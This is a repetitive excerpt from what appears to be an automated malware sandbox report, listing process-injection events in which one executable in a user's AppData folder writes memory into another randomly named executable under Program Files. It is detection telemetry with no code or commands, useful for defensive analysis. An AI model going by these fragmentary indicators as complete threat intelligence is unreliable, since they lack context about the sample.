                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B30000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B71778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B7178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B71BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B71BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2390000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 23D1778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 23D178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 23D1BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 23D1BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2C90000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CD1778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CD178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CD1BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CD1BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 29E0000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A21778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A2178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A21BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A21BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 24E0000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2521778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 252178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2521BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2521BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 1640000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 1681778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 168178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 1681BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 1681BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CC0000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D01778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D0178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D01BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D01BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2310000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2351778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 235178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2351BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2351BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A50000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A91778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A9178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A91BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A91BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2720000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2761778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 276178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2761BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2761BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2460000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 24A1778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 24A178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 24A1BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 24A1BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2740000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2781778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 278178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2781BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2781BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 11B0000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 11F1778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 11F178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 11F1BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 11F1BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2EA0000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2EE1778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2EE178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2EE1BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2EE1BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2AC0000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B01778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B0178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B01BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B01BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 24C0000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2501778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 250178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2501BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2501BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D00000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D41778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D4178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D41BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D41BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2AC0000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B01778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B0178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B01BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B01BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 3190000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 31D1778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 31D178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 31D1BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 31D1BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A40000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A81778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A8178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A81BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A81BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 390000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 3D1778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 3D178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 3D1BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 3D1BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2C60000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CA1778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CA178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CA1BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CA1BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2970000Jump to behavior
